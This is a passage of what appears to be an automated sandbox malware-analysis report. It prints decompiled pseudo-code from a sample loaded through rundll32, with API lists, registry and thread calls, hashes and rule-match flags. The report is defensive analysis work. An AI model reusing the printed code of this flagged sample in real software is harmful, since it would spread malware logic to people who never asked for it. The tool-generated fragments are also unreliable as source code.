                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID:
                                                          • API String ID: 3043112668-0
                                                          • Opcode ID: fea75adafd40a28c9a0eed0735da72bcad8719f363ae0b2addc50efa211343fd
                                                          • Instruction ID: 073ee52e4ae357228f05f80086698231049d72599848176cba822f21a8a84ef8
                                                          • Opcode Fuzzy Hash: fea75adafd40a28c9a0eed0735da72bcad8719f363ae0b2addc50efa211343fd
                                                          • Instruction Fuzzy Hash: 76018F71B083566FE720DA6ACD48F67BF9DEBC9650F881011F955CB382DA70D852C6A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D7928 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 64%
                                                          			E036D7928(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E036D3F07(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x36da348; // 0x228d5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x36db4e0; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x36db8f4; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E036D23AA();
					_push( &_v64);
					if( *0x36da100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E036D23AA();
				}
				return _t28;
			}















                                                          0x036d7928
                                                          0x036d792f
                                                          0x036d7938
                                                          0x036d793d
                                                          0x036d7941
                                                          0x036d794b
                                                          0x036d7950
                                                          0x036d7955
                                                          0x036d795a
                                                          0x036d7964
                                                          0x036d796e
                                                          0x036d796e
                                                          0x036d7966
                                                          0x036d7966
                                                          0x036d7966
                                                          0x036d7966
                                                          0x036d7974
                                                          0x036d797a
                                                          0x036d797b
                                                          0x036d797e
                                                          0x036d7981
                                                          0x036d7984
                                                          0x036d798c
                                                          0x036d7995
                                                          0x036d799d
                                                          0x036d799d
                                                          0x036d799f
                                                          0x036d79a1
                                                          0x036d79a1
                                                          0x036d79ab

                                                          APIs
                                                            • Part of subcall function 036D3F07: SysAllocString.OLEAUT32(00000000), ref: 036D3F61
                                                            • Part of subcall function 036D3F07: SysAllocString.OLEAUT32(0070006F), ref: 036D3F75
                                                            • Part of subcall function 036D3F07: SysAllocString.OLEAUT32(00000000), ref: 036D3F87
                                                          • memset.NTDLL ref: 036D794B
                                                          • GetLastError.KERNEL32 ref: 036D7997
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocString$ErrorLastmemset
                                                          • String ID: <
                                                          • API String ID: 3736384471-4251816714
                                                          • Opcode ID: 69c996b20d295bc90db02b29c705648c030fa469086739f537c875831e973ebb
                                                          • Instruction ID: ed76b6fda50bab80ce72e9e9d0c24ad22e9402d752ac89277bef2c9817743307
                                                          • Opcode Fuzzy Hash: 69c996b20d295bc90db02b29c705648c030fa469086739f537c875831e973ebb
                                                          • Instruction Fuzzy Hash: C6014076D01318AFCB10EFA9D884EDEBBB8BB08740F454169F905EB248D77095148B95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628B7A4 Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,0689B7F0,?), ref: 0628B7B9
                                                          • RegOpenKeyA.ADVAPI32(80000001,0689B7F0,?), ref: 0628B7C3
                                                          • lstrlen.KERNEL32(0689B7F0,00000000,00000000,00000000,?,0628A2EB,00000001,?,00000000,00000000,00000000,?,0627109E,06299F2C,00000008,00000003), ref: 0628B7E2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateOpenlstrlen
                                                          • String ID:
                                                          • API String ID: 2865187142-0
                                                          • Opcode ID: 4161a26aa39d12ede6a050e853f39000fcefd3cba305fc99ecc24c1568588158
                                                          • Instruction ID: 75bfabcac180dbfc47ba0dea37f39169ba45e6f98b9031ec1d585739c89351d1
                                                          • Opcode Fuzzy Hash: 4161a26aa39d12ede6a050e853f39000fcefd3cba305fc99ecc24c1568588158
                                                          • Instruction Fuzzy Hash: BAF0F676511308BFE751AF54DC98FAA7B7CEF45765F10800DFE0289280D6709680CBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628E831 Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetEvent.KERNEL32(000005A0,0628C3DB), ref: 0628E83B
                                                            • Part of subcall function 062734FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0628E846), ref: 06273528
                                                            • Part of subcall function 062734FF: RtlDeleteCriticalSection.NTDLL(0629A3E0), ref: 0627355B
                                                            • Part of subcall function 062734FF: RtlDeleteCriticalSection.NTDLL(0629A400), ref: 06273562
                                                            • Part of subcall function 062734FF: ReleaseMutex.KERNEL32(000005C0,00000000,?,?,?,0628E846), ref: 0627358B
                                                            • Part of subcall function 062734FF: FindCloseChangeNotification.KERNEL32(?,?,0628E846), ref: 06273597
                                                            • Part of subcall function 062734FF: ResetEvent.KERNEL32(00000000,00000000,?,?,?,0628E846), ref: 062735A3
                                                            • Part of subcall function 062734FF: CloseHandle.KERNEL32(?,?,0628E846), ref: 062735AF
                                                            • Part of subcall function 062734FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0628E846), ref: 062735B5
                                                            • Part of subcall function 062734FF: SleepEx.KERNEL32(00000064,00000001,?,?,0628E846), ref: 062735C9
                                                            • Part of subcall function 062734FF: HeapFree.KERNEL32(00000000,00000000,?,?,0628E846), ref: 062735ED
                                                            • Part of subcall function 062734FF: RtlRemoveVectoredExceptionHandler.NTDLL(061605B8), ref: 06273623
                                                            • Part of subcall function 062734FF: SleepEx.KERNEL32(00000064,00000001,?,?,0628E846), ref: 0627363F
                                                          • CloseHandle.KERNEL32(000005A0), ref: 0628E850
                                                          • HeapDestroy.KERNELBASE(064A0000), ref: 0628E860
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$Close$CriticalDeleteEventHandleHeapSection$ChangeDestroyExceptionFindFreeHandlerMutexNotificationReleaseRemoveResetVectored
                                                          • String ID:
                                                          • API String ID: 3503058985-0
                                                          • Opcode ID: 8aeea4c1dbcef60b58847aa88af4b76fde07476460876ac8eda3847742d096cc
                                                          • Instruction ID: b1857e3b2857eaf715cb2fe5a583fd8171dcb2f2094dc1d3c8eb52872837036e
                                                          • Opcode Fuzzy Hash: 8aeea4c1dbcef60b58847aa88af4b76fde07476460876ac8eda3847742d096cc
                                                          • Instruction Fuzzy Hash: 5AE01270B113425FDB61AF35FC5CE0A33DA6B856857490424BA16D2150DB30C440FE30
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D2575 Relevance: 3.8, APIs: 3, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D2575(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E036D6D63(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x36da378, 0x110);
					_t27 =  *0x36da37c; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E036D138A(0x110, _a4, _a4, _t27, 0);
					}
					if(E036D6BF2( &_v36) != 0) {
						_t35 = E036D5FBB(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E036D13C7(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							memset(_t55, 0, _v12 - (_t46[4] & 0xf));
							_t57 = _t57 + 0xc;
							E036D6C2C(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E036D6C2C(_a4);
				}
				return _v16;
			}
















                                                          0x036d257b
                                                          0x036d2580
                                                          0x036d258d
                                                          0x036d2590
                                                          0x036d2593
                                                          0x036d2598
                                                          0x036d259d
                                                          0x036d25ab
                                                          0x036d25b0
                                                          0x036d25b5
                                                          0x036d25ba
                                                          0x036d25bc
                                                          0x036d25c5
                                                          0x036d25c5
                                                          0x036d25d4
                                                          0x036d25e9
                                                          0x036d25f0
                                                          0x036d25f7
                                                          0x036d25fd
                                                          0x036d2603
                                                          0x036d260b
                                                          0x036d2611
                                                          0x036d2621
                                                          0x036d2626
                                                          0x036d262a
                                                          0x036d262a
                                                          0x036d25f0
                                                          0x036d2635
                                                          0x036d2640
                                                          0x036d2640
                                                          0x036d264c

                                                          APIs
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,036D4493,?), ref: 036D25AB
                                                          • memset.NTDLL ref: 036D2621
                                                          • memset.NTDLL ref: 036D2635
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 1529149438-0
                                                          • Opcode ID: 636be9677d405b6d1053cc7be2accc299b10d0ae4f42e243f2389036f962fd0a
                                                          • Instruction ID: 1fb9f2282f0d9a7546c0b66eb43fe9bcf23f9dc93d9abeabc2afd2c4b149df45
                                                          • Opcode Fuzzy Hash: 636be9677d405b6d1053cc7be2accc299b10d0ae4f42e243f2389036f962fd0a
                                                          • Instruction Fuzzy Hash: FD211B75E00218ABDB11EFA5DC50FAEBBB9EF09640F044469F904EA254E735DA118BA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06285D7A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 062771B4: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0629A170,00000000,06285D81,?,0627F2F7,?), ref: 062771D3
                                                            • Part of subcall function 062771B4: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0629A170,00000000,06285D81,?,0627F2F7,?), ref: 062771DE
                                                            • Part of subcall function 062771B4: _wcsupr.NTDLL ref: 062771EB
                                                            • Part of subcall function 062771B4: lstrlenW.KERNEL32(00000000), ref: 062771F3
                                                          • ResumeThread.KERNEL32(00000004,?,0627F2F7,?), ref: 06285D8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                                                          • String ID: v
                                                          • API String ID: 3646851950-1801730948
                                                          • Opcode ID: 19eb1090002df9f0980517a6a96c6d6116346ba88717aa27804375770ab7cd44
                                                          • Instruction ID: d11abe8f0a84ac06bcd440eab2b9dc454d07e06b5b58615482d21021617cad87
                                                          • Opcode Fuzzy Hash: 19eb1090002df9f0980517a6a96c6d6116346ba88717aa27804375770ab7cd44
                                                          • Instruction Fuzzy Hash: 65D09E38635312AEEBE62B21DD09F167D925F81B54F008464FD95604A0C7768460DA55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D1F7A Relevance: 3.1, APIs: 2, Instructions: 149serviceCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E036D1F7A(intOrPtr _a4) {
				void* _v12;
				char _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				short _t73;
				intOrPtr* _t74;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t82;
				char* _t98;
				intOrPtr _t100;
				void* _t106;
				void* _t108;
				intOrPtr _t112;

				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x36da348; // 0x228d5a8
				_t4 = _t49 + 0x36db448; // 0x59689f0
				_t82 = 0;
				_t5 = _t49 + 0x36db438; // 0x9ba05972
				_t51 =  *0x36da170(_t5, 0, 4, _t4,  &_v20); // executed
				_t106 = _t51;
				if(_t106 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t98 =  &_v48;
					_push(_t98);
					_push(_t98);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x36da348; // 0x228d5a8
						_t30 = _t56 + 0x36db428; // 0x59689d0
						_t31 = _t56 + 0x36db458; // 0x4c96be40
						_t58 =  *0x36da10c(_v12, _t31, _t30,  &_v24); // executed
						_t106 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t106 >= 0) {
							_t112 = _v16;
							if(_t112 == 0) {
								_t106 = 0x80004005;
								goto L11;
							} else {
								if(_t112 <= 0) {
									L11:
									if(_t106 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = 3;
										_v48 = _t73;
										_t74 = _v20;
										_v40 = _t82;
										_t108 = _t108 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
										if(_t106 < 0) {
											goto L7;
										} else {
											_t77 =  *0x36da348; // 0x228d5a8
											_t23 = _t77 + 0x36db428; // 0x59689d0
											_t24 = _t77 + 0x36db458; // 0x4c96be40
											_t106 =  *0x36da10c(_v12, _t24, _t23,  &_v24);
											_t80 = _v12;
											 *((intOrPtr*)( *_t80 + 8))(_t80);
											if(_t106 >= 0) {
												L12:
												_t63 = _v24;
												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t106 >= 0) {
													_t100 =  *0x36da348; // 0x228d5a8
													_t67 = _v28;
													_t40 = _t100 + 0x36db418; // 0x214e3
													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t82 = _t82 + 1;
									} while (_t82 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t106;
			}


































                                                          0x036d1f85
                                                          0x036d1f8c
                                                          0x036d1f8d
                                                          0x036d1f8e
                                                          0x036d1f8f
                                                          0x036d1f95
                                                          0x036d1f9a
                                                          0x036d1fa3
                                                          0x036d1fa6
                                                          0x036d1fad
                                                          0x036d1fb3
                                                          0x036d1fb7
                                                          0x036d1fbd
                                                          0x036d1fc5
                                                          0x036d1fc6
                                                          0x036d1fcb
                                                          0x036d1fcc
                                                          0x036d1fce
                                                          0x036d1fd1
                                                          0x036d1fd2
                                                          0x036d1fd3
                                                          0x036d1fd9
                                                          0x036d206f
                                                          0x036d2074
                                                          0x036d207b
                                                          0x036d2085
                                                          0x036d208b
                                                          0x036d208d
                                                          0x036d2093
                                                          0x00000000
                                                          0x036d1fdf
                                                          0x036d1fdf
                                                          0x036d1fe6
                                                          0x036d1fef
                                                          0x036d1ff3
                                                          0x036d1ff9
                                                          0x036d1ffc
                                                          0x036d2064
                                                          0x00000000
                                                          0x036d1ffe
                                                          0x036d1ffe
                                                          0x036d2096
                                                          0x036d2098
                                                          0x00000000
                                                          0x00000000
                                                          0x036d2004
                                                          0x036d2004
                                                          0x036d2006
                                                          0x036d200b
                                                          0x036d200f
                                                          0x036d2012
                                                          0x036d2017
                                                          0x036d201f
                                                          0x036d2020
                                                          0x036d2021
                                                          0x036d2023
                                                          0x036d2027
                                                          0x036d202b
                                                          0x00000000
                                                          0x036d202d
                                                          0x036d2031
                                                          0x036d2036
                                                          0x036d203d
                                                          0x036d204d
                                                          0x036d204f
                                                          0x036d2055
                                                          0x036d205a
                                                          0x036d209a
                                                          0x036d209a
                                                          0x036d20a7
                                                          0x036d20ab
                                                          0x036d20b0
                                                          0x036d20b6
                                                          0x036d20bb
                                                          0x036d20c5
                                                          0x036d20c7
                                                          0x036d20cd
                                                          0x036d20cd
                                                          0x036d20d0
                                                          0x036d20d6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d205a
                                                          0x00000000
                                                          0x036d205c
                                                          0x036d205c
                                                          0x036d205d
                                                          0x00000000
                                                          0x036d2062
                                                          0x036d1ffe
                                                          0x036d1ffc
                                                          0x036d1ff3
                                                          0x036d20d9
                                                          0x036d20d9
                                                          0x036d20df
                                                          0x036d20df
                                                          0x036d20e8

                                                          APIs
                                                          • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,059689D0,036D3F35,?,?,?,?,?,?,?,?,?,?,?,036D3F35), ref: 036D2047
                                                          • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,059689D0,036D3F35,?,?,?,?,?,?,?,036D3F35,00000000,00000000,00000000,006D0063), ref: 036D2085
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: QueryServiceUnknown_
                                                          • String ID:
                                                          • API String ID: 2042360610-0
                                                          • Opcode ID: cb463c5b023098faa827a41e862d0b5f5e3eb703d94e87e1e7af32f43a50df73
                                                          • Instruction ID: aae0725a1a61d81447932dd5d8884d3cdf0020824cbb928de9930cba8de3cbcd
                                                          • Opcode Fuzzy Hash: cb463c5b023098faa827a41e862d0b5f5e3eb703d94e87e1e7af32f43a50df73
                                                          • Instruction Fuzzy Hash: C9513D75D00219AFCB40DFE8C898DEEB7B9FF48710B058999E905EB254D671AD42CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D46CB Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 75%
                                                          			E036D46CB(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E036D74FE(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x36da348; // 0x228d5a8
						_t20 = _t68 + 0x36db1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E036D65D1(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                          0x036d46d1
                                                          0x036d46d4
                                                          0x036d46e4
                                                          0x036d46ed
                                                          0x036d46f1
                                                          0x036d47bf
                                                          0x036d47c5
                                                          0x036d47c5
                                                          0x036d470b
                                                          0x036d4710
                                                          0x036d4714
                                                          0x036d471a
                                                          0x036d471f
                                                          0x036d4726
                                                          0x036d4735
                                                          0x036d4735
                                                          0x036d4739
                                                          0x036d473b
                                                          0x036d4747
                                                          0x036d4752
                                                          0x036d475d
                                                          0x036d4761
                                                          0x036d476b
                                                          0x036d476f
                                                          0x036d4771
                                                          0x036d4776
                                                          0x036d477d
                                                          0x036d478d
                                                          0x036d478d
                                                          0x036d4776
                                                          0x036d476f
                                                          0x036d478f
                                                          0x036d4794
                                                          0x036d4799
                                                          0x036d4799
                                                          0x036d479c
                                                          0x036d47a5
                                                          0x036d47aa
                                                          0x036d47aa
                                                          0x036d47af
                                                          0x036d47b4
                                                          0x036d47b4
                                                          0x036d47af
                                                          0x036d4739
                                                          0x036d47b6
                                                          0x036d47bc
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 036D74FE: SysAllocString.OLEAUT32(80000002), ref: 036D755B
                                                            • Part of subcall function 036D74FE: SysFreeString.OLEAUT32(00000000), ref: 036D75C1
                                                          • SysFreeString.OLEAUT32(?), ref: 036D47AA
                                                          • SysFreeString.OLEAUT32(036D3520), ref: 036D47B4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: 02256085d477798fd2a0dca411f78b54a159988356b0d6aaf7e434c435bad2ed
                                                          • Instruction ID: bf5d430e2e104c2475cec6dd459f51500f374e2d370e41828c1713d179d21b94
                                                          • Opcode Fuzzy Hash: 02256085d477798fd2a0dca411f78b54a159988356b0d6aaf7e434c435bad2ed
                                                          • Instruction Fuzzy Hash: A9315E75900118AFCB12EF95CC88C9BBBBAFFCA7407244658F9059B214DB31DD51CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D5634 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E036D5634(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x36da348; // 0x228d5a8
				_t2 = _t42 + 0x36db468; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x36da348; // 0x228d5a8
					_t6 = _t45 + 0x36db488; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x36da348; // 0x228d5a8
							_t30 = _v8;
							_t12 = _t48 + 0x36db478; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}


















                                                          0x036d5640
                                                          0x036d5641
                                                          0x036d5647
                                                          0x036d564e
                                                          0x036d5650
                                                          0x036d5654
                                                          0x036d5658
                                                          0x036d565a
                                                          0x036d5663
                                                          0x036d5669
                                                          0x036d5671
                                                          0x036d5673
                                                          0x036d5677
                                                          0x036d5679
                                                          0x036d5686
                                                          0x036d568a
                                                          0x036d568f
                                                          0x036d5695
                                                          0x036d569a
                                                          0x036d56a2
                                                          0x036d56a4
                                                          0x036d56a6
                                                          0x036d56ac
                                                          0x036d56ac
                                                          0x036d56af
                                                          0x036d56b5
                                                          0x036d56b5
                                                          0x036d56b8
                                                          0x036d56be
                                                          0x036d56be
                                                          0x036d56c5

                                                          APIs
